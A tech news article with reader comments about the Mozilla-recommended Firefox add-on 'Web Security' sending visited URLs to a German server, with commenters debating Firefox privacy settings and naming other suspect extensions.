Mozilla recommended privacy extension had "phone-home" feature
A browser extension for the Firefox web browser that Mozilla recommended on its official Firefox blog as one of the extensions to make the "Firefox browser a privacy superpower" had phone-home functionality baked into the extension that would submit the current URL and previously visited URLs to a server in Germany on every website load.
Web Security, the name of the add-on, claims to protect users actively "from malware, tampered websites or phishing sites". The extension has more than 223,000 users according to Mozilla AMO and a rating of 3.7 out of 5.
Mozilla wrote on the official site:
Web Security is a sophisticated browser add-on that uses an extensive database to prevent websites from harming your computer or obtaining your sensitive data. Users are often lured to open counterfeit websites of banks, by convincing emails. The Web Security extension will help you detect these counterfeit sites so that you will not be decoyed to enter your sensitive information where it is not safe.
The organization removed the recommendation from the official blog post after allegations were made that the extension transmitted data to a server in Germany on every connect.
Mike Kuketz published an analysis on his German blog. The extension Web Security transmits encrypted information over an insecure connection whenever a domain is visited in the browser.
A quick check with the network analyzer Wireshark confirmed the finding. Web Security communicates with a server IP address whenever a new page is loaded in the Firefox browser the extension is installed in.
The data is encrypted; interested users find the function in include/background.js when they extract the extension and they will notice that it submits visited URLs to the server.
When the user opens the pages, used by Web Security, the following information gets processed to assure the successful operation of Web Security: the web pages that the user opens or the operating web server, the name of the internet service provider of the user and the website from which the user came from and the sub-pages the user opened.
The main issue for Firefox users is not that a privacy extension submits information to a server on every visit; that is bad but it has happened in the past and it will continue to happen as extensions are not reviewed manually anymore before they are published on AMO.
The main issue is that Mozilla recommended the extension on the official company blog as a privacy enhancing extension. The article still states that the collection includes 14 privacy extensions while only 13 are listed due to the removal of Web Security from the listing.
When Mozilla noticed the error in judgement, it removed the recommendation but did not update the article to inform users about the removal.
The blog post has no author attached to it and it is unclear who published the recommendations as no author is listed on the site.
Now You: What is your take?
Well dat smells stinkowiff!
So Mozilla went from reviewing every extension to recommending extensions without even understanding what they are really doing under the hood.
Sounds like something Google would do.
@Chris: would do? Has done, both on the Chrome Web Store and Google Play ;-)
Now you know why manual addon code review is gone. Because all the capable people of doing it also left Mozilla.
>Firefox browser a privacy superpower
It’s a bit of a bold claim coming from a company of which browser needs hundreds of obscure settings toggled to make it shut up and not send your data who knows where.
True, but all other browsers don’t even have those settings and are linked to companies who are more “dangerous” because they are bigger and know more about you already before you use their browser.
Not all other browsers, Waterfox is an ethical fork of Firefox that has most of the spying removed out of the box, plus other user-hostile Mozilla changes reversed.
I for one realize that excessive exaggeration is a thing now when trying to make a point. I plead guilty as should many others!
Waterfox can be a good choice for some people but like all other browsers it has areas that can be improved on and its use comes at a price. And, misbehaving extensions will still misbehave when using Waterfox.
“plus other user-hostile Mozilla changes reversed” Hostile? (relating to, or characteristic of an enemy: antagonistic) What changes has Waterfox made that reverses Mozilla “hostility” directed at its users? Just curious.
As far as studies and experiments go I have a Test profile with the boxes available in the Privacy Settings page unchecked and I am yet to see anything added to the browser that I don’t want. And I left about:config unmolested other than a few security settings.
“browser needs hundreds of obscure settings toggled to make it shut up and not send your data who knows where” Hundreds? Obscure? How dare you? LoL
There are changes that can be made, that are easily accessible in the Settings, that will have a big impact on data shared by the browser. And for those that want to clamp down on data even further there are a dozen or two settings in about:config for prefetch, predictor, referers, speculative parallel limit, beacon.enabled, webrtc and a few others. Most of which by the way are at the exact same default settings in Waterfox.
If you’re referring to the very thorough ghacks.user.js with “hundreds” of settings, they are to some degree, in my opinion, redundant, repetitious, let’s be absolutely sure, just in case, because we can. Removing IDs and URLs for example is just a fail-safe in case some bug rears its ugly head because some people want to remove any possibility, no matter how remote the possibility is, of an unwanted connection being made, just in case, because we can. And that’s fine. To some degree I also do the just in case because I can in about:config. If all the changes are really needed is debatable. Even then I’m not seeing hundreds of “privacy” specific settings.
I will always agree that some about:config settings should be on a Settings page. Like mousewheel acceleration start and factor and smoothscroll duration, because not changing those in FF just freaks me the eff out. ;) Then there are referer settings and some others that should be on a Settings page. At least they’re available.
Richard, my config file has over 450 entries (it’s 486 lines, but not all are config entries). I think it’s safe to say hundreds of obscure settings have been toggled to make what I would deem as a usable browser. And with every Firefox update I have to dig in to find out what other nonsense Mozilla has slipped in which I might want to disable. It’s a constant battle of Mozilla adding more crap to this browser and me removing/disabling it, one battle of which I’m really getting tired and seriously consider alternatives. At this point the bookmarks manager is the only thing keeping me on Firefox.
For the record, the current ghacks user.js (excluding the deprecated section and parrots) has 326 active prefs. Some are enforcing defaults (some of these it depends on your FF version, branch). Some are redundant (but not many, and always included for good reason – some were there *before* they were at current default, eg SSL 1.3 for example – some are for future proofing and yes it’s happened before!, and we’re spanning whole ESR cycles for good measure). Some are included to make sections “complete” for full knowledge. It’s meant to be comprehensive for a reason.
> browser needs hundreds of obscure settings toggled to make it shut up and not send your data who knows where
I agree with Richard. Most telemetry can be disabled directly in the UI with a couple of clicks. And only a few other prefs need attention to fully close that down. i.e to do directly with telemetry. Mozilla are entitled to that. If you don’t trust them (and I do when they say it’s not collecting ID’ing info and it’s de-anonymized etc – exclude the odd mistake with shield studies), then go use a different browser. Oh wait, they gave you the ability to actually turn it off.
However, yes, there are hundreds of settings which can really tighten things up. Besides telemetry, there is real-time safe-browsing binary checks. And as Richard mentioned, things like prefetching. But ALL major browsers have that as a default, except niche ones like Waterfox. All Waterfox is in this regard (i.e about settings, not XUL) is a SLIGHTLY tweaked firefox (maybe a couple of patches, not really interested).
A major browser needs to work with all open standards and not break things. So of course a FF out of the box will have a swag of privacy implications:
– prefetch for speed: they need to compete with end user’s expectations
– Safe Browsing using google’s info (which is not a privacy concern, except the real time binary checks, but people think it is)
– and we could go on.
The difference is that people *choose* to specifically get Waterfox because it has these things turned off or whatever. If Firefox did that by default, no-one in essence would use it, because everything breaks, or major articles would appear – Firefox doesn’t protect you from known malicious websites like chrome does, etc. At the end of the day, they need numbers, and that is only a good thing for diversity in the browser space.
At least they provide thousands of settings under the hood. At last count I think total prefs in FF62 numbered 3.5K (excluding maybe some hidden ones, and system addon ones only in the system addon xpi’s)
In my “Test” profile I have 312 actual about:config (user_pref) entries. I’ve intentionally made as few changes in about:config as I can and tried first to make most of my changes from the Settings pages. I have offline website data, cookies and site data cleared at the end of each browser session, 3rd party cookies are not allowed and telemetry, studies and crash reports are disabled, tracking protection is enabled. As small as my config file is I still changed from within about:config: beacon.enabled, cache sizes, dom settings, geo, prefetch, smoothscroll, mousewheel acceleration, network settings, referers and cipher suites used. Sounds like a lot but my 312 about:config entries shows otherwise. The profile works very well using only four extensions and, I feel good about the security and privacy configuration as it is. I would be fine using this profile as my default if I added some extensions from the “default” profile.
My “default” profile has 540 about:config entries, not lines but actual entries. The default profile has 13 extensions installed and actually outperforms my six other browser installs, including Nightly. I think Nightly, because of its twice daily updates, has great days, good days and…some not so good days. :)
Wasn’t the same (i.e. transmitting data) also true for Firefox Focus, a browser published by Mozilla that was (is!) intended to enhance privacy?
Yeah, they send it to Adjust GmbH. Privacy focused browser my a$$.
Of course it’s more evidence you can’t trust any extensions added to your web browser – regardless of the source. Google Web Store is guilty of far more egregious behavior and lowered standards to such a low level there aren’t anymore. Computer software tested to be as advertised and safe today may not be tomorrow and most certainly will not be on third party sites.
But are only scratching the surface if you limit your inquiry to the above. Microsoft purchased Git-Hub recently and what kind of assurance do you think we could expect from Microsoft regarding software integrity at Git-Hub. Answer: None. Same answer for anyone else.
The concept of “access” will likely be redefined and see internet being broken up into separate and distinct tiers, most of which won’t be open to the general public. Because like an individual waving a hundred dollar bill around in the middle of the night shouting “Wow, look at what I’ve found.” is going to get mugged. Most of us don’t want to associate with or be around that kind of stupidity.
Ouch, I wasn’t aware that M$ had acquired Github, and for a pretty hefty price tag at US$7.5 billion as well.
I see the sparks are flying already too: https://github.com/selfagency/microsoft-drop-ice
Hopefully that is just a few DUMBSHITS on github. Ice protects USA from terrorists and despite msm lies they are not racist, many are Hispanic. Fucking Idiots!
That’s incredibly stupid! Beyond naive, well into ignorant. We have a culture of mushroom people who seriously need to put away their electronic junk and go outside. Yeah, the pics are sad but as long as we’re eliminating ICE, let’s disband the military, no one ever invades US. DUUUUHHHH!!!!!
You can only bite the hand that feeds you so many times.
I don’t think the folks at Github are advocating disbanding ICE, just Microsoft’s association with them.
And let’s not forget that it’s been ICE which has been responsible for immigrant families from war torn countries seeking safe haven in the US for separating children from their parents so that the adults can be sent to jail.
As for Microsoft, they’ve never been a friend of open source software with the then CEO Steve Balmer describing Linux as a cancer back in 2001. So OS developers are fully justified in being suspicious of Microsoft’s intentions with their acquisition of Github.
I had heard about the ‘U.S. Immigration and Customs Enforcement’ (https://en.wikipedia.org/wiki/U.S._Immigration_and_Customs_Enforcement) but ignored its ICE abbreviation.
“When Mozilla noticed the error in judgement, it removed the recommendation but did not update the article to inform users about the removal.”
Because Mozilla has not yet implemented a robot for that, be patient.
The IP in the screenshot 184.108.40.206 is registered to Synatix GmbH. According to Symantec there’s an Adware called Peppi published by them: https://www.symantec.com/security-center/writeup/2008-061318-4755-99
Martin, I can’t seem to find any reference to Web Security on that Mozilla blog that you linked in your article. Did they change the content after the news about this extension came out (or after your article)?
They removed the quoted part from the blog post but before I published this article.
Virtually everyone is doing the same, whether it’s Google, MS, or your favorite browser and it doesn’t matter whether you pay for services or not or what settings you use.
Your data and history is out there.
To be honest, the quality of Mozilla extension has been dracstically dropped quite a lot, nonsense and useless/less useful extension is released everyday but the quality is not even as good as a userscript/userstyle…
Well, that is sad, I rather want high quality extensions like Greasemonkey, Custom Button, uBlock rather than thoses…
A loss of quality for the sake of speed? I do agree with that, observable everywhere by the way except, maybe, in the luxury area.
It’s not new at all that Mozilla rapes our privacy all the time while pretending to defend it for the gullible, this has been going on for years and accelerating like crazy during the last year, there is just lots of inertia to fight before the majority of users integrate this fact and switches to a sane fork.
Never trust an extension just because it’s recommended by Mozilla. They recommend the infamous Ghostery too.
Never trust any large corporation or organization. The same can also apply to small ones. Popularity guarantees nothing, look how many people use compromised products or accept monopolistic services who extort them with phony “fees” and “surcharges” like the telecoms do. People blindly submit to authority. They are as submissive to these corporations as they are to a government.
Mozilla not only allowing but more over recommending an infected extension is relevant of modern times’ productivism all based on more at lesser cost and leads to a continuous and increasing falling of reliability, be it in software security/privacy, agriculture and food quality, transports, constructions and you name it. Fifty years’ old bridges collapse when centuries’ old constructions are still standing.
There is definitely a problem all about quantity, speed, pace. Quality is too expensive nowadays and has entered the topic of luxury. The ‘Kleenex’ era is here, cheap, use & forget, buy again. Mad.
But when it comes to a company advertising its commitment to users’ privacy my opinion is not that this company is lying but that it is not giving itself the means of its ambition and promises. It is undoubtedly failing, but not sunk. I won’t force it to drown, but I certainly hope mistakes as this one will wake up some brilliant minds and recall them that repeated failures are quickly interpreted as a crappy if not lying communication strategy.
Regarding my practice of new extensions, my policy is to download it first, unzip it, check the files for ‘http’ occurrences and where they point to, in the same way that, as a pedestrian, I don’t rely on traffic signals but on the reality of the road : cars or not? Products’ traffic signals nowadays have become unreliable, don’t count on them, check for yourself. Cheaper than before except that you have to do by yourself what was previously included in the price. Definitely an amazing proportion of Bozos in the business arena, which is a pity because a good and reliable product is the best possible advertisement.
These problems are more due to profit-driven production than to productivity itself.
The day productivity will be defined as a rate including quality I’ll consider profit-driven production as an exception.
When I was a kid studying in the United Nations International School (UNIS) in N.Y., our French teacher from the ‘Alliance FranÃ§aise’ told us this story I never forgot and which describes the paradox of productivity in terms of happiness and which is understandable even for non-lefties as we were and remain : she had traveled to Mexico and found a gorgeous sombrero. She asked the craftsman if he’d make her a price if she bought several of the same sombrero to what the old man answered “I make you a price if you ask me several different sombreros but it’ll be more expensive if you want them all the same because repeating is bothering when creating is not”.
So lets forget demagogy, so relative. I’d be a democrat in the USA but certainly not a ‘Socialist’ in France. When we returned to Europe then in France I discovered that the left-wings would consider anyone not sitting, speaking and acting as a leftist was considered as a rightist, so I guess we were rightist: what the heck? Free, open-minded, committed to individuals rather than to sociology and at the same time adversary to any system based on slavery. Took me decades to start wondering if this approach based on education is still valid when I observe what this free entrepreneurial and markets are leading to. No demagogy and still not on a far left but I admit i’m slowly starting to wonder if i’m not deeply mistaking. Sorry for this very personal slip to out-of-context thoughts, I only meant to make my case clear.
It all sounds like you are becoming an old man surfing on personal memories that continue to have less relevance for today’s life. I may have the very same problem however I do my best not to advertise in a manner as you do.
@jan, I have to agree with you concerning that very comment of mine you are referring to. But if I happen to digress it’s never in such a confidential way. I guess i slipped that day. This said, in another context, one not committed to technology I’m not sure the past, be it ours, “continues to have less relevance”. That’s another debate and this is not the place for it, as well.
Tom, rushed, half assed products are de rigeur today because there are markets for them. When customers demand good products and I’m not sure there are many customers, especially younger ones, who know what good design and execution are, supply will shift to meet demand. A lot of junk producers will evaporate, a good thing.
Not getting down on kiddies but growing up staring at phones playing the latest vid of some idiot screaming while conversing with “friends” at machine gun speed so they don’t miss the next dopamine rush leaves little time for creativity and reflection. Twenty pairs of ear buds to find some that don’t sound like crap? Then buy 20 more pairs. There’s your market.
It’s not a supply problem, it’s demand. This is a supply problem
(Maybe you’ve seen these pics):
Of course there is demand for privacy-respecting software.
But profit controls the supply.
And it’s more profitable that this demand is not satisfied.
Has anyone ever done some objective research into recent Chrome versions, to look into whether the browser really phones home/mines data after youâ€™ve disabled the usage stats option? I know people keep repeating this ad nauseam, but it is this actually true? My company, a multinational consultancy, allows an extension-free Chrome (with some basic settings locked down) on its standard builds while Firefox is prohibited. Why would that be?
“My company, a multinational consultancy, allows an extension-free Chrome (with some basic settings locked down) on its standard builds while Firefox is prohibited. Why would that be?”
Who knows? There’s certainly no security reason for it. I can’t speak to Chrome’s behavior, but Firefox certainly does not phone home once you’ve disabled that stuff, so if your company policy is due to security, it’s inexplicable why they’d be OK with Chrome and not with Firefox.
My criticism of Firefox in terms of privacy (and I think it’s a serious criticism) is that it’s not as easy to lock it down as it should be. However, you absolutely can lock it down, and doing so isn’t *that* big of a deal.
Not only ‘Web Security’, also
Browser Privacy https://addons.mozilla.org/firefox/addon/browser-privacy/
Browser Safety https://addons.mozilla.org/firefox/addon/browser-safety/
Web Security, Browser-Security and Browser Privacy send every page visit to 220.127.116.11
Browser Safety send every page visit to https://api.browser-safety.org/
See my (Ñ‚Ð±Ð´Ñ‰) comment under this post https://adguard.com/en/blog/big-star-labs-spyware/
By the way, I wrote a negative review on the â€˜Web Securityâ€™ extension page some time ago (about fake reviews and similar extensions), but it disappeared. If you look at the rating of the extension, you will see that it counts from 64 reviews, but now only 16 are displayed.
‘Popup Blocker’ addon also sends every page visit to 18.104.22.168
Addons offered at yttools.io , fbtools.io and dirtylittlehelpers.com under suspicion:
See domain connection graphs:
More addons from smarttube.io https://addons.mozilla.org/firefox/user/CSS-IO/
They all have similar code in ‘background.js’ file.
See reverse IP lookup https://viewdns.info/reverseip/?host=web-security.com&t=1
All these add-ons are now blocklisted.
Do you have an exert of the malicious JS code that is common in all those addons, I would try to search for the same code in my other extensions even in chormium to be sure ???? ðŸ¤”
Todays Internet is a JANUSHEAD, sees in two Directions, collect and hide.
So where is the problem, choose wisely and get to know, what to do to protect.
Nothing more, nothing less, eh?
P.S.: what is a JANUSHEAD? Look here:
There you see what it means,…^^
“…The date and duration of the individual page visits will be stored by Creative Software Solutions GmbH in an anonymous form and checked against a database operated by Creative Software Solutions GmbH to alert the user about malicious sites…”
How can any user trust a for-profit corporation like Mozilla to care about their privacy?
The question is whether they knew about this or not. Years ago I would have never posed such a question, but with Mozilla’s behavior over the past two years, who is to say one way or the other.
I think if Mozilla team recommends “anything” then they should integrate the extension into the browser itself. I won’t trust by myself any “non-merged” extension. I use Firefox for few things and I don’t want that those few things become compromising with external extensions. :S
I understand what you mean but the fact is that if Firefox had to integrate all Mozilla recommended extensions the browser would be over-bloated, not to mention that if a user takes into consideration (IF!) Mozilla’s recommendations doesn’t mean the extension itself interests him. Personally I care no more of Mozilla’s recommendations than I do of arts and movie critics or as the Chef’s suggestion in restaurants.
How many layers of redundant pfishing/malware/altered site protection does one need? These are already in FF and your AV, maybe your router, too. I guess one could disable each layer until one’s satisfied their add on has a clean slate from which to block but maintaining databases is in no way fun. Why even bother with add ons like the one mentioned? A year ago, I turned off all additional protection layers for just FF, the number of blocked pages is no different (almost none) and browsing is much faster. FF was doing all the blocking before, the others never caught anything. I do keep my blocked hosts file up to date; it blocks a site occasionally.
Yeah FF uses google but third parties use similar databases, for privacy a true VPN and/or Tor work well.
Privacy superpower? Privacy is a distinct category, not a catch-all for the three malicious intent nasties mentioned. If Web Security transferred your IP, you’ve lost a huge chunk of privacy, phoning home is just icing on the poop cake. I’d read Mozilla’s hype and move on; it doesn’t make any sense. Mozilla is silent on using all 13 (now) of the extensions mentioned together, some users probably will. A good insomnia cure, that would be! I see one that’s sort of useful, bloody vikings, but even privacy badger gets slow as it builds it’s humongous site data base.
Any add on or program one installs should be monitored for weird connections to be blocked; dump the add on if it’s obstinate. Seems like mozilla’s trying to resist but caving faster and faster to data collection revenue. They’re not watching the shop very well; it’s more and more up to users to understand how their browsers work.
That’s why I love ghacks, thank you, specially for this kind of articles. keep it up!
Here’s another suspicious one, still up on the Firefox Add-ons site:
I almost installed that developer’s “Download Manager (S3)” a few days ago, as it appeared to be by far the best substitute for the venerable, pre-WebExtensions Download Status Bar. But all these recent revelations about dodgy extensions have made me far more cautious. Mozilla’s evidently asleep at the wheel – it’s like “we’ve improved the security skeleton – you deal with the meat.”
Yes, about the developer of the S3 extensions I already warned people on the Pale Moon’s forum long time ago. These extensions was on the Pale Moon add-ons web page and nothing was done. Then suddenly recently after this discovery has grown all S3 extensions were removed from the PM add-ons page. And like with Mozilla not update from the PM team to inform users about the removal and why.
I’ve been avoiding all Firefox extensions developed by ‘Oleksandr’ (https://addons.mozilla.org/en-US/firefox/user/senselius/) ever since I noticed in his ‘ScreenGrab!’ pre-Quantum add-on a call to s3blog.org, confirmed with his FF57+ extensions. It’s been noted by some users on AOM but the show goes on. The add-ons (pre-Quantum) had the option to block theses calls which vanished with his Quantum extensions. Confirmed with another of his extensions, ‘Worldwide Radio’ where s3blog.org is called for the display of the radios’ logos (or the country’s flag, don’t remember) when these could easily be included in the extension. I haven’t tested all of his extensions but two (plus a third one, add-on only never ported to a Webextension) is enough for me to avoid all the extensions of this developer.
It’s apparent you can’t rely on Mozilla to respond proactively even when specific concerns are raised. A motivated external expert must take it upon themselves to fully investigate, document, and make the news. Even if that happens, seems all you can expect is for them to meekly remove the add-on and not inform those affected.
They can be dismissive of mere tip-offs:
The attitude in that example is like “thanks, but maybe that’s in the past and perhaps the developer’s cleaned up their act – you look into it further then send us a report”.
Which means 75,459 users are left unaware one of their add-ons may without their consent be reporting every domain they visit to the add-on developer and to a suspicious ad network.
Do you recall what Worldwide Radio sends exactly? I note it was one of the three winners of Mozilla’s Firefox Quantum Extensions Challenge:
chip.de has blocked the Web Security fÃ¼r Firefox for downloading after a forum-thread there, explaining the problems: https://www.chip.de/downloads/Web-Security-fuer-Firefox_146506999.html
Thats obviously more than Mozilla is willing to do to get rid of these “man-in-the-middle-attack”-extensions. Well done, CHIP! :)
Chip.de malicious installers
Blocked by uBlock Origin current badware risks list
That site doesn’t seem like a trust reference…
Moz. is way beyond the date “best before …” It is a walking wounded and it is only a matter of time. It seems there is no stopping of its blunders.
Official Statement anyone?
I have concluded that Mozilla doesn’t care about privacy anymore.
Funny how your browsing history is not personally identifiable information. Loopholes man.